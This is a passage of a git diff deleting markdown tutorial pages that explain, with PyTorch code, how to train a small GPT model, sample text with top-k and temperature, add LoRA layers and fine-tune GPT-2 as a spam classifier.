- -# Apply Train/validation ratio and create dataloaders -train_ratio = 0.90 -split_idx = int(train_ratio * len(text_data)) -train_data = text_data[:split_idx] -val_data = text_data[split_idx:] - -torch.manual_seed(123) - -train_loader = create_dataloader_v1( - train_data, - batch_size=2, - max_length=GPT_CONFIG_124M["context_length"], - stride=GPT_CONFIG_124M["context_length"], - drop_last=True, - shuffle=True, - num_workers=0 -) - -val_loader = create_dataloader_v1( - val_data, - batch_size=2, - max_length=GPT_CONFIG_124M["context_length"], - stride=GPT_CONFIG_124M["context_length"], - drop_last=False, - shuffle=False, - num_workers=0 -) - - -# Sanity checks -if total_tokens * (train_ratio) < GPT_CONFIG_124M["context_length"]: - print("Not enough tokens for the training loader. 
" - "Try to lower the `GPT_CONFIG_124M['context_length']` or " - "increase the `training_ratio`") - -if total_tokens * (1-train_ratio) < GPT_CONFIG_124M["context_length"]: - print("Not enough tokens for the validation loader. " - "Try to lower the `GPT_CONFIG_124M['context_length']` or " - "decrease the `training_ratio`") - -print("Train loader:") -for x, y in train_loader: - print(x.shape, y.shape) - -print("\nValidation loader:") -for x, y in val_loader: - print(x.shape, y.shape) - -train_tokens = 0 -for input_batch, target_batch in train_loader: - train_tokens += input_batch.numel() - -val_tokens = 0 -for input_batch, target_batch in val_loader: - val_tokens += input_batch.numel() - -print("Training tokens:", train_tokens) -print("Validation tokens:", val_tokens) -print("All tokens:", train_tokens + val_tokens) - - -# Indicate the device to use -if torch.cuda.is_available(): - device = torch.device("cuda") -elif torch.backends.mps.is_available(): - device = torch.device("mps") -else: - device = torch.device("cpu") - -print(f"Using {device} device.") - -model.to(device) # no assignment model = model.to(device) necessary for nn.Module classes - - - -# Pre-calculate losses without starting yet -torch.manual_seed(123) # For reproducibility due to the shuffling in the data loader - -with torch.no_grad(): # Disable gradient tracking for efficiency because we are not training, yet - train_loss = calc_loss_loader(train_loader, model, device) - val_loss = calc_loss_loader(val_loader, model, device) - -print("Training loss:", train_loss) -print("Validation loss:", val_loss) - - -# Functions to train the data -def train_model_simple(model, train_loader, val_loader, optimizer, device, num_epochs, - eval_freq, eval_iter, start_context, tokenizer): - # Initialize lists to track losses and tokens seen - train_losses, val_losses, track_tokens_seen = [], [], [] - tokens_seen, global_step = 0, -1 - - # Main training loop - for epoch in range(num_epochs): - model.train() # Set model to training mode - - for input_batch, target_batch in train_loader: - optimizer.zero_grad() # Reset loss gradients from previous batch iteration - loss = calc_loss_batch(input_batch, target_batch, model, device) - loss.backward() # Calculate loss gradients - optimizer.step() # Update model weights using loss gradients - tokens_seen += input_batch.numel() - global_step += 1 - - # Optional evaluation step - if global_step % eval_freq == 0: - train_loss, val_loss = evaluate_model( - model, train_loader, val_loader, device, eval_iter) - train_losses.append(train_loss) - val_losses.append(val_loss) - track_tokens_seen.append(tokens_seen) - print(f"Ep {epoch+1} (Step {global_step:06d}): " - f"Train loss {train_loss:.3f}, Val loss {val_loss:.3f}") - - # Print a sample text after each epoch - generate_and_print_sample( - model, tokenizer, device, start_context - ) - - return train_losses, val_losses, track_tokens_seen - - -def evaluate_model(model, train_loader, val_loader, device, eval_iter): - model.eval() - with torch.no_grad(): - train_loss = calc_loss_loader(train_loader, model, device, num_batches=eval_iter) - val_loss = calc_loss_loader(val_loader, model, device, num_batches=eval_iter) - model.train() - return train_loss, val_loss - - -def generate_and_print_sample(model, tokenizer, device, start_context): - model.eval() - context_size = model.pos_emb.weight.shape[0] - encoded = text_to_token_ids(start_context, tokenizer).to(device) - with torch.no_grad(): - token_ids = generate_text( - model=model, idx=encoded, - 
max_new_tokens=50, context_size=context_size - ) - decoded_text = token_ids_to_text(token_ids, tokenizer) - print(decoded_text.replace("\n", " ")) # Compact print format - model.train() - - -# Start training! -import time -start_time = time.time() - -torch.manual_seed(123) -model = GPTModel(GPT_CONFIG_124M) -model.to(device) -optimizer = torch.optim.AdamW(model.parameters(), lr=0.0004, weight_decay=0.1) - -num_epochs = 10 -train_losses, val_losses, tokens_seen = train_model_simple( - model, train_loader, val_loader, optimizer, device, - num_epochs=num_epochs, eval_freq=5, eval_iter=5, - start_context="Every effort moves you", tokenizer=tokenizer -) - -end_time = time.time() -execution_time_minutes = (end_time - start_time) / 60 -print(f"Training completed in {execution_time_minutes:.2f} minutes.") - - - -# Show graphics with the training process -import matplotlib.pyplot as plt -from matplotlib.ticker import MaxNLocator -import math -def plot_losses(epochs_seen, tokens_seen, train_losses, val_losses): - fig, ax1 = plt.subplots(figsize=(5, 3)) - ax1.plot(epochs_seen, train_losses, label="Training loss") - ax1.plot( - epochs_seen, val_losses, linestyle="-.", label="Validation loss" - ) - ax1.set_xlabel("Epochs") - ax1.set_ylabel("Loss") - ax1.legend(loc="upper right") - ax1.xaxis.set_major_locator(MaxNLocator(integer=True)) - ax2 = ax1.twiny() - ax2.plot(tokens_seen, train_losses, alpha=0) - ax2.set_xlabel("Tokens seen") - fig.tight_layout() - plt.show() - - # Compute perplexity from the loss values - train_ppls = [math.exp(loss) for loss in train_losses] - val_ppls = [math.exp(loss) for loss in val_losses] - # Plot perplexity over tokens seen - plt.figure() - plt.plot(tokens_seen, train_ppls, label='Training Perplexity') - plt.plot(tokens_seen, val_ppls, label='Validation Perplexity') - plt.xlabel('Tokens Seen') - plt.ylabel('Perplexity') - plt.title('Perplexity over Training') - plt.legend() - plt.show() - -epochs_tensor = torch.linspace(0, num_epochs, len(train_losses)) -plot_losses(epochs_tensor, tokens_seen, train_losses, val_losses) - - -torch.save({ - "model_state_dict": model.state_dict(), - "optimizer_state_dict": optimizer.state_dict(), - }, -"/tmp/model_and_optimizer.pth" -) -``` - -Let's see an explanation step by step - -### Functions to transform text <--> ids - -These are some simple functions that can be used to transform from texts from the vocabulary to ids and backwards. This is needed at the begging of the handling of the text and at the end fo the predictions: - -```python -# Functions to transform from tokens to ids and from to ids to tokens -def text_to_token_ids(text, tokenizer): - encoded = tokenizer.encode(text, allowed_special={'<|endoftext|>'}) - encoded_tensor = torch.tensor(encoded).unsqueeze(0) # add batch dimension - return encoded_tensor - -def token_ids_to_text(token_ids, tokenizer): - flat = token_ids.squeeze(0) # remove batch dimension - return tokenizer.decode(flat.tolist()) -``` - -### Generate text functions - -In a previos section a function that just got the **most probable token** after getting the logits. However, this will mean that for each entry the same output is always going to be generated which makes it very deterministic. - -The following `generate_text` function, will apply the `top-k` , `temperature` and `multinomial` concepts. - -- The **`top-k`** means that we will start reducing to `-inf` all the probabilities of all the tokens expect of the top k tokens. 
So, if k=3, before making a decision only the 3 most probably tokens will have a probability different from `-inf`. -- The **`temperature`** means that every probability will be divided by the temperature value. A value of `0.1` will improve the highest probability compared with the lowest one, while a temperature of `5` for example will make it more flat. This helps to improve to variation in responses we would like the LLM to have. -- After applying the temperature, a **`softmax`** function is applied again to make all the reminding tokens have a total probability of 1. -- Finally, instead of choosing the token with the biggest probability, the function **`multinomial`** is applied to **predict the next token according to the final probabilities**. So if token 1 had a 70% of probabilities, token 2 a 20% and token 3 a 10%, 70% of the times token 1 will be selected, 20% of the times it will be token 2 and 10% of the times will be 10%. - -```python -# Generate text function -def generate_text(model, idx, max_new_tokens, context_size, temperature=0.0, top_k=None, eos_id=None): - - # For-loop is the same as before: Get logits, and only focus on last time step - for _ in range(max_new_tokens): - idx_cond = idx[:, -context_size:] - with torch.no_grad(): - logits = model(idx_cond) - logits = logits[:, -1, :] - - # New: Filter logits with top_k sampling - if top_k is not None: - # Keep only top_k values - top_logits, _ = torch.topk(logits, top_k) - min_val = top_logits[:, -1] - logits = torch.where(logits < min_val, torch.tensor(float("-inf")).to(logits.device), logits) - - # New: Apply temperature scaling - if temperature > 0.0: - logits = logits / temperature - - # Apply softmax to get probabilities - probs = torch.softmax(logits, dim=-1) # (batch_size, context_len) - - # Sample from the distribution - idx_next = torch.multinomial(probs, num_samples=1) # (batch_size, 1) - - # Otherwise same as before: get idx of the vocab entry with the highest logits value - else: - idx_next = torch.argmax(logits, dim=-1, keepdim=True) # (batch_size, 1) - - if idx_next == eos_id: # Stop generating early if end-of-sequence token is encountered and eos_id is specified - break - - # Same as before: append sampled index to the running sequence - idx = torch.cat((idx, idx_next), dim=1) # (batch_size, num_tokens+1) - - return idx -``` - -> [!NOTE] -> There is a common alternative to `top-k` called [**`top-p`**](https://en.wikipedia.org/wiki/Top-p_sampling), also known as nucleus sampling, which instead of getting k samples with the most probability, it **organizes** all the resulting **vocabulary** by probabilities and **sums** them from the highest probability to the lowest until a **threshold is reached**. -> -> Then, **only those words** of the vocabulary will be considered according to their relative probabilities -> -> This allows to not need to select a number of `k` samples, as the optimal k might be different on each case, but **only a threshold**. -> -> _Note that this improvement isn't included in the previous code._ - -> [!NOTE] -> Another way to improve the generated text is by using **Beam search** instead of the greedy search sued in this example.\ -> Unlike greedy search, which selects the most probable next word at each step and builds a single sequence, **beam search keeps track of the top ๐‘˜ k highest-scoring partial sequences** (called "beams") at each step. 
By exploring multiple possibilities simultaneously, it balances efficiency and quality, increasing the chances of **finding a better overall** sequence that might be missed by the greedy approach due to early, suboptimal choices. -> -> _Note that this improvement isn't included in the previous code._ - -### Loss functions - -The **`calc_loss_batch`** function calculates the cross entropy of the a prediction of a single batch.\ -The **`calc_loss_loader`** gets the cross entropy of all the batches and calculates the **average cross entropy**. - -```python -# Define loss functions -def calc_loss_batch(input_batch, target_batch, model, device): - input_batch, target_batch = input_batch.to(device), target_batch.to(device) - logits = model(input_batch) - loss = torch.nn.functional.cross_entropy(logits.flatten(0, 1), target_batch.flatten()) - return loss - -def calc_loss_loader(data_loader, model, device, num_batches=None): - total_loss = 0. - if len(data_loader) == 0: - return float("nan") - elif num_batches is None: - num_batches = len(data_loader) - else: - # Reduce the number of batches to match the total number of batches in the data loader - # if num_batches exceeds the number of batches in the data loader - num_batches = min(num_batches, len(data_loader)) - for i, (input_batch, target_batch) in enumerate(data_loader): - if i < num_batches: - loss = calc_loss_batch(input_batch, target_batch, model, device) - total_loss += loss.item() - else: - break - return total_loss / num_batches -``` - -> [!NOTE] -> **Gradient clipping** is a technique used to enhance **training stability** in large neural networks by setting a **maximum threshold** for gradient magnitudes. When gradients exceed this predefined `max_norm`, they are scaled down proportionally to ensure that updates to the modelโ€™s parameters remain within a manageable range, preventing issues like exploding gradients and ensuring more controlled and stable training. -> -> _Note that this improvement isn't included in the previous code._ -> -> Check the following example: - -
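-A minimal sketch of how it could be inserted into the training loop used in this chapter (`max_norm=1.0` is just an example value):
-
-```python
-# Inside the training loop, after computing the gradients and before the optimizer step:
-loss = calc_loss_batch(input_batch, target_batch, model, device)
-loss.backward()                                   # Calculate loss gradients
-
-# Rescale all gradients so that their global L2 norm does not exceed max_norm
-torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=1.0)
-
-optimizer.step()                                  # Update model weights using the clipped gradients
-```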
- -### Loading Data - -The functions `create_dataloader_v1` and `create_dataloader_v1` were already discussed in a previous section. - -From here note how it's defined that 90% of the text is going to be used for training while the 10% will be used for validation and both sets are stored in 2 different data loaders.\ -Note that some times part of the data set is also left for a testing set to evaluate better the performance of the model. - -Both data loaders are using the same batch size, maximum length and stride and num workers (0 in this case).\ -The main differences are the data used by each, and the the validators is not dropping the last neither shuffling the data is it's not needed for validation purposes. - -Also the fact that **stride is as big as the context length**, means that there won't be overlapping between contexts used to train the data (reduces overfitting but also the training data set). - -Moreover, note that the batch size in this case it 2 to divide the data in 2 batches, the main goal of this is to allow parallel processing and reduce the consumption per batch. - -```python -train_ratio = 0.90 -split_idx = int(train_ratio * len(text_data)) -train_data = text_data[:split_idx] -val_data = text_data[split_idx:] - -torch.manual_seed(123) - -train_loader = create_dataloader_v1( - train_data, - batch_size=2, - max_length=GPT_CONFIG_124M["context_length"], - stride=GPT_CONFIG_124M["context_length"], - drop_last=True, - shuffle=True, - num_workers=0 -) - -val_loader = create_dataloader_v1( - val_data, - batch_size=2, - max_length=GPT_CONFIG_124M["context_length"], - stride=GPT_CONFIG_124M["context_length"], - drop_last=False, - shuffle=False, - num_workers=0 -) -``` - -## Sanity Checks - -The goal is to check there are enough tokens for training, shapes are the expected ones and get some info about the number of tokens used for training and for validation: - -```python -# Sanity checks -if total_tokens * (train_ratio) < GPT_CONFIG_124M["context_length"]: - print("Not enough tokens for the training loader. " - "Try to lower the `GPT_CONFIG_124M['context_length']` or " - "increase the `training_ratio`") - -if total_tokens * (1-train_ratio) < GPT_CONFIG_124M["context_length"]: - print("Not enough tokens for the validation loader. " - "Try to lower the `GPT_CONFIG_124M['context_length']` or " - "decrease the `training_ratio`") - -print("Train loader:") -for x, y in train_loader: - print(x.shape, y.shape) - -print("\nValidation loader:") -for x, y in val_loader: - print(x.shape, y.shape) - -train_tokens = 0 -for input_batch, target_batch in train_loader: - train_tokens += input_batch.numel() - -val_tokens = 0 -for input_batch, target_batch in val_loader: - val_tokens += input_batch.numel() - -print("Training tokens:", train_tokens) -print("Validation tokens:", val_tokens) -print("All tokens:", train_tokens + val_tokens) -``` - -### Select device for training & pre calculations - -The following code just select the device to use and calculates a training loss and validation loss (without having trained anything yet) as a starting point. 
- -```python -# Indicate the device to use - -if torch.cuda.is_available(): - device = torch.device("cuda") -elif torch.backends.mps.is_available(): - device = torch.device("mps") -else: - device = torch.device("cpu") - -print(f"Using {device} device.") - -model.to(device) # no assignment model = model.to(device) necessary for nn.Module classes - -# Pre-calculate losses without starting yet -torch.manual_seed(123) # For reproducibility due to the shuffling in the data loader - -with torch.no_grad(): # Disable gradient tracking for efficiency because we are not training, yet - train_loss = calc_loss_loader(train_loader, model, device) - val_loss = calc_loss_loader(val_loader, model, device) - -print("Training loss:", train_loss) -print("Validation loss:", val_loss) -``` - -### Training functions - -The function `generate_and_print_sample` will just get a context and generate some tokens in order to get a feeling about how good is the model at that point. This is called by `train_model_simple` on each step. - -The function `evaluate_model` is called as frequently as indicate to the training function and it's used to measure the train loss and the validation loss at that point in the model training. - -Then the big function `train_model_simple` is the one that actually train the model. It expects: - -- The train data loader (with the data already separated and prepared for training) -- The validator loader -- The **optimizer** to use during training: This is the function that will use the gradients and will update the parameters to reduce the loss. In this case, as you will see, `AdamW` is used, but there are many more. - - `optimizer.zero_grad()` is called to reset the gradients on each round to not accumulate them. - - The **`lr`** param is the **learning rate** which determines the **size of the steps** taken during the optimization process when updating the model's parameters. A **smaller** learning rate means the optimizer **makes smaller updates** to the weights, which can lead to more **precise** convergence but might **slow down** training. A **larger** learning rate can speed up training but **risks overshooting** the minimum of the loss function (**jump over** the point where the loss function is minimized). - - **Weight Decay** modifies the **Loss Calculation** step by adding an extra term that penalizes large weights. This encourages the optimizer to find solutions with smaller weights, balancing between fitting the data well and keeping the model simple preventing overfitting in machine learning models by discouraging the model from assigning too much importance to any single feature. - - Traditional optimizers like SGD with L2 regularization couple weight decay with the gradient of the loss function. However, **AdamW** (a variant of Adam optimizer) decouples weight decay from the gradient update, leading to more effective regularization. 
-- The device to use for training -- The number of epochs: Number of times to go over the training data -- The evaluation frequency: The frequency to call `evaluate_model` -- The evaluation iteration: The number of batches to use when evaluating the current state of the model when calling `generate_and_print_sample` -- The start context: Which the starting sentence to use when calling `generate_and_print_sample` -- The tokenizer - -```python -# Functions to train the data -def train_model_simple(model, train_loader, val_loader, optimizer, device, num_epochs, - eval_freq, eval_iter, start_context, tokenizer): - # Initialize lists to track losses and tokens seen - train_losses, val_losses, track_tokens_seen = [], [], [] - tokens_seen, global_step = 0, -1 - - # Main training loop - for epoch in range(num_epochs): - model.train() # Set model to training mode - - for input_batch, target_batch in train_loader: - optimizer.zero_grad() # Reset loss gradients from previous batch iteration - loss = calc_loss_batch(input_batch, target_batch, model, device) - loss.backward() # Calculate loss gradients - optimizer.step() # Update model weights using loss gradients - tokens_seen += input_batch.numel() - global_step += 1 - - # Optional evaluation step - if global_step % eval_freq == 0: - train_loss, val_loss = evaluate_model( - model, train_loader, val_loader, device, eval_iter) - train_losses.append(train_loss) - val_losses.append(val_loss) - track_tokens_seen.append(tokens_seen) - print(f"Ep {epoch+1} (Step {global_step:06d}): " - f"Train loss {train_loss:.3f}, Val loss {val_loss:.3f}") - - # Print a sample text after each epoch - generate_and_print_sample( - model, tokenizer, device, start_context - ) - - return train_losses, val_losses, track_tokens_seen - - -def evaluate_model(model, train_loader, val_loader, device, eval_iter): - model.eval() # Set in eval mode to avoid dropout - with torch.no_grad(): - train_loss = calc_loss_loader(train_loader, model, device, num_batches=eval_iter) - val_loss = calc_loss_loader(val_loader, model, device, num_batches=eval_iter) - model.train() # Back to training model applying all the configurations - return train_loss, val_loss - - -def generate_and_print_sample(model, tokenizer, device, start_context): - model.eval() # Set in eval mode to avoid dropout - context_size = model.pos_emb.weight.shape[0] - encoded = text_to_token_ids(start_context, tokenizer).to(device) - with torch.no_grad(): - token_ids = generate_text( - model=model, idx=encoded, - max_new_tokens=50, context_size=context_size - ) - decoded_text = token_ids_to_text(token_ids, tokenizer) - print(decoded_text.replace("\n", " ")) # Compact print format - model.train() # Back to training model applying all the configurations -``` - -> [!NOTE] -> To improve the learning rate there are a couple relevant techniques called **linear warmup** and **cosine decay.** -> -> **Linear warmup** consist on define an initial learning rate and a maximum one and consistently update it after each epoch. This is because starting the training with smaller weight updates decreases the risk of the model encountering large, destabilizing updates during its training phase.\ -> **Cosine decay** is a technique that **gradually reduces the learning rate** following a half-cosine curve **after the warmup** phase, slowing weight updates to **minimize the risk of overshooting** the loss minima and ensure training stability in later phases. 
-> -> _Note that these improvements aren't included in the previous code._ - -### Start training - -```python -import time -start_time = time.time() - -torch.manual_seed(123) -model = GPTModel(GPT_CONFIG_124M) -model.to(device) -optimizer = torch.optim.AdamW(model.parameters(), lr=0.0004, weight_decay=0.1) - -num_epochs = 10 -train_losses, val_losses, tokens_seen = train_model_simple( - model, train_loader, val_loader, optimizer, device, - num_epochs=num_epochs, eval_freq=5, eval_iter=5, - start_context="Every effort moves you", tokenizer=tokenizer -) - -end_time = time.time() -execution_time_minutes = (end_time - start_time) / 60 -print(f"Training completed in {execution_time_minutes:.2f} minutes.") -``` - -### Print training evolution - -With the following function it's possible to print the evolution of the model while it was being trained. - -```python -import matplotlib.pyplot as plt -from matplotlib.ticker import MaxNLocator -import math -def plot_losses(epochs_seen, tokens_seen, train_losses, val_losses): - fig, ax1 = plt.subplots(figsize=(5, 3)) - ax1.plot(epochs_seen, train_losses, label="Training loss") - ax1.plot( - epochs_seen, val_losses, linestyle="-.", label="Validation loss" - ) - ax1.set_xlabel("Epochs") - ax1.set_ylabel("Loss") - ax1.legend(loc="upper right") - ax1.xaxis.set_major_locator(MaxNLocator(integer=True)) - ax2 = ax1.twiny() - ax2.plot(tokens_seen, train_losses, alpha=0) - ax2.set_xlabel("Tokens seen") - fig.tight_layout() - plt.show() - - # Compute perplexity from the loss values - train_ppls = [math.exp(loss) for loss in train_losses] - val_ppls = [math.exp(loss) for loss in val_losses] - # Plot perplexity over tokens seen - plt.figure() - plt.plot(tokens_seen, train_ppls, label='Training Perplexity') - plt.plot(tokens_seen, val_ppls, label='Validation Perplexity') - plt.xlabel('Tokens Seen') - plt.ylabel('Perplexity') - plt.title('Perplexity over Training') - plt.legend() - plt.show() - -epochs_tensor = torch.linspace(0, num_epochs, len(train_losses)) -plot_losses(epochs_tensor, tokens_seen, train_losses, val_losses) -``` - -### Save the model - -It's possible to save the model + optimizer if you want to continue training later: - -```python -# Save the model and the optimizer for later training -torch.save({ - "model_state_dict": model.state_dict(), - "optimizer_state_dict": optimizer.state_dict(), - }, -"/tmp/model_and_optimizer.pth" -) -# Note that this model with the optimizer occupied close to 2GB - -# Restore model and optimizer for training -checkpoint = torch.load("/tmp/model_and_optimizer.pth", map_location=device) - -model = GPTModel(GPT_CONFIG_124M) -model.load_state_dict(checkpoint["model_state_dict"]) -optimizer = torch.optim.AdamW(model.parameters(), lr=5e-4, weight_decay=0.1) -optimizer.load_state_dict(checkpoint["optimizer_state_dict"]) -model.train(); # Put in training mode -``` - -Or just the model if you are planing just on using it: - -```python -# Save the model -torch.save(model.state_dict(), "model.pth") - -# Load it -model = GPTModel(GPT_CONFIG_124M) - -model.load_state_dict(torch.load("model.pth", map_location=device)) - -model.eval() # Put in eval mode -``` - -## Loading GPT2 weights - -There 2 quick scripts to load the GPT2 weights locally. 
-
-## References
-
-- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
-
diff --git a/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md b/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md
deleted file mode 100644
index 4c3302dee..000000000
--- a/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md
+++ /dev/null
@@ -1,61 +0,0 @@
-# 7.0. LoRA Improvements in Fine-Tuning
-
-## LoRA Improvements
-
-> [!TIP]
-> **LoRA greatly reduces the computation** needed to **fine-tune** already trained models.
-
-LoRA makes it possible to fine-tune **large models** efficiently by only changing a **small part** of the model. It reduces the number of parameters that need to be trained, saving **memory** and **computational resources**. This is because:

-1. **Reduces the number of trainable parameters**: Instead of updating the whole weight matrix of the model, LoRA **splits** the weight matrix into two smaller matrices (called **A** and **B**). This makes training **faster** and requires **less memory** because fewer parameters need to be updated.
-
-1. This is because, instead of computing the complete weight update of a layer (matrix), it approximates the update as the product of two smaller matrices, shrinking the update that has to be computed (the original figure illustrated this decomposition; a formula sketch is given right after this list):
-
-2. **Keeps the original model weights unchanged**: LoRA keeps the original model weights the same and only updates the **new small matrices** (A and B). This is useful because it means the original knowledge of the model is preserved while only the necessary parts are adjusted.
-3. **Efficient task-specific fine-tuning**: When you want to adapt the model to a **new task**, you can just train the **small LoRA matrices** (A and B) and leave the rest of the model as it is. This is **much more efficient** than re-training the whole model.
-4. **Storage efficiency**: After fine-tuning, instead of saving a **whole new model** for every task, only the **LoRA matrices** need to be stored, which are tiny compared to the full model. This makes it easy to adapt the model to many tasks without using too much storage.
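-
-Standing in for that figure, the decomposition can be written as follows (the notation is assumed from the description above: a frozen weight matrix of size d×k, a rank r much smaller than d and k, and the same alpha scaling used in the code below):
-
-```latex
-% LoRA low-rank update: only A and B are trained, W stays frozen
-W' = W + \Delta W \approx W + \alpha \, (A B),
-\qquad A \in \mathbb{R}^{d \times r},\; B \in \mathbb{R}^{r \times k}
-% Trainable values: full update = d * k, LoRA update = r * (d + k), with r << min(d, k)
-```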
-
-In order to implement LoraLayers instead of Linear ones during the fine-tuning, this code is proposed here [https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb):
-```python
-import math
-import torch
-
-# Create the LoRA layer with the 2 matrices and the alpha
-class LoRALayer(torch.nn.Module):
-    def __init__(self, in_dim, out_dim, rank, alpha):
-        super().__init__()
-        self.A = torch.nn.Parameter(torch.empty(in_dim, rank))
-        torch.nn.init.kaiming_uniform_(self.A, a=math.sqrt(5))  # similar to standard weight initialization
-        self.B = torch.nn.Parameter(torch.zeros(rank, out_dim))
-        self.alpha = alpha
-
-    def forward(self, x):
-        x = self.alpha * (x @ self.A @ self.B)
-        return x
-
-# Combine it with the linear layer
-class LinearWithLoRA(torch.nn.Module):
-    def __init__(self, linear, rank, alpha):
-        super().__init__()
-        self.linear = linear
-        self.lora = LoRALayer(
-            linear.in_features, linear.out_features, rank, alpha
-        )
-
-    def forward(self, x):
-        return self.linear(x) + self.lora(x)
-
-# Replace linear layers with LoRA ones
-def replace_linear_with_lora(model, rank, alpha):
-    for name, module in model.named_children():
-        if isinstance(module, torch.nn.Linear):
-            # Replace the Linear layer with LinearWithLoRA
-            setattr(model, name, LinearWithLoRA(module, rank, alpha))
-        else:
-            # Recursively apply the same function to child modules
-            replace_linear_with_lora(module, rank, alpha)
-```
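-
-A possible usage sketch (the `rank` and `alpha` values are illustrative and `model` is assumed to be the GPT model instance from the previous sections): freeze the original weights, swap in the LoRA layers and check how few parameters remain trainable:
-
-```python
-# Freeze every original parameter of the pre-trained model...
-for param in model.parameters():
-    param.requires_grad = False
-
-# ...and replace the Linear layers by LinearWithLoRA wrappers
-replace_linear_with_lora(model, rank=16, alpha=16)
-
-# Only the small A and B matrices are now trainable
-trainable = sum(p.numel() for p in model.parameters() if p.requires_grad)
-total = sum(p.numel() for p in model.parameters())
-print(f"Trainable parameters: {trainable:,} / {total:,}")
-```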
-## References
-
-- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
diff --git a/src/todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md b/src/todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md
deleted file mode 100644
index 447524b91..000000000
--- a/src/todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md
+++ /dev/null
@@ -1,117 +0,0 @@
-# 7.1. Fine-Tuning for Classification
-
-## What is
-
-Fine-tuning is the process of taking a **pre-trained model** that has learned **general language patterns** from vast amounts of data and **adapting** it to perform a **specific task** or to understand domain-specific language. This is achieved by continuing the training of the model on a smaller, task-specific dataset, allowing it to adjust its parameters to better suit the nuances of the new data while leveraging the broad knowledge it has already acquired. Fine-tuning enables the model to deliver more accurate and relevant results in specialized applications without the need to train a new model from scratch.
-
-> [!NOTE]
-> As pre-training an LLM that "understands" text is pretty expensive, it's usually easier and cheaper to fine-tune open source pre-trained models to perform the specific task we want them to perform.
-
-> [!TIP]
-> The goal of this section is to show how to fine-tune an already pre-trained model so that, instead of generating new text, the LLM gives the **probabilities of the given text being categorized in each of the given categories** (like whether a text is spam or not).
-
-## Preparing the data set
-
-### Data set size
-
-Of course, in order to fine-tune a model you need some structured data to use to specialise your LLM. In the example proposed in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb), GPT2 is fine-tuned to detect if an email is spam or not using the data from [https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip](https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip)_._
-
-This data set contains many more examples of "not spam" than of "spam", therefore the book suggests to **only use as many examples of "not spam" as of "spam"** (hence removing all the extra examples from the training data). In this case, this was 747 examples of each.
-
-Then, **70%** of the data set is used for **training**, **10%** for **validation** and **20%** for **testing**.
-
-- The **validation set** is used during the training phase to fine-tune the model's **hyperparameters** and make decisions about model architecture, effectively helping to prevent overfitting by providing feedback on how the model performs on unseen data. It allows for iterative improvements without biasing the final evaluation.
-  - This means that although the data included in this data set is not used for the training directly, it's used to tune the best **hyperparameters**, so this set cannot be used to evaluate the performance of the model like the testing one.
-- In contrast, the **test set** is used **only after** the model has been fully trained and all adjustments are complete; it provides an unbiased assessment of the model's ability to generalize to new, unseen data. This final evaluation on the test set gives a realistic indication of how the model is expected to perform in real-world applications.
-
-### Entries length
-
-As the training example expects entries (email texts in this case) of the same length, it was decided to make every entry as large as the largest one by adding the ids of `<|endoftext|>` as padding.
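-
-A minimal sketch of that padding step (assuming tiktoken's GPT-2 encoding, where `<|endoftext|>` maps to token id 50256, and a couple of made-up example texts):
-
-```python
-import tiktoken
-
-tokenizer = tiktoken.get_encoding("gpt2")
-pad_token_id = tokenizer.encode("<|endoftext|>", allowed_special={"<|endoftext|>"})[0]  # 50256
-
-texts = ["You won a prize! Call now", "See you tomorrow at the meeting"]
-encoded = [tokenizer.encode(t) for t in texts]
-max_length = max(len(ids) for ids in encoded)
-
-# Right-pad every entry with <|endoftext|> ids so all entries share the same length
-padded = [ids + [pad_token_id] * (max_length - len(ids)) for ids in encoded]
-```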
-
-### Initialize the model
-
-Using the open-source pre-trained weights, initialize the model to train. We have already done this before, and by following the instructions of [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb) you can easily do it.
-
-## Classification head
-
-In this specific example (predicting if a text is spam or not), we are not interested in fine-tuning over the complete vocabulary of GPT2: we only want the new model to say if the email is spam (1) or not (0). Therefore, we are going to **modify the final layer that** gives the probabilities per token of the vocabulary for one that only gives the probabilities of being spam or not (so like a vocabulary of 2 words).
-
-```python
-# This code replaces the final layer with a Linear one with 2 outputs
-num_classes = 2
-model.out_head = torch.nn.Linear(
-    in_features=BASE_CONFIG["emb_dim"],
-    out_features=num_classes
-)
-```
-
-## Parameters to tune
-
-In order to fine-tune fast it's easier to not fine-tune all the parameters but only some final ones. This is because it's known that the lower layers generally capture basic language structures and semantics that are broadly applicable. So, just **fine-tuning the last layers is usually enough and faster**.
-
-```python
-# This code makes all the parameters of the model untrainable
-for param in model.parameters():
-    param.requires_grad = False
-
-# Allow to fine-tune the last layer in the transformer block
-for param in model.trf_blocks[-1].parameters():
-    param.requires_grad = True
-
-# Allow to fine-tune the final layer norm
-for param in model.final_norm.parameters():
-    param.requires_grad = True
-```
-
-## Entries to use for training
-
-In previous sections the LLM was trained by reducing the loss of every predicted token, even though almost all the predicted tokens were in the input sentence (only 1 at the end was really predicted), so that the model would understand the language better.
-
-In this case we only care about the model being able to predict if the text is spam or not, so we only care about the last token predicted. Therefore, it's needed to modify our previous training loss functions to only take that token into account.
-
-This is implemented in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb) as:
-
-```python
-def calc_accuracy_loader(data_loader, model, device, num_batches=None):
-    model.eval()
-    correct_predictions, num_examples = 0, 0
-
-    if num_batches is None:
-        num_batches = len(data_loader)
-    else:
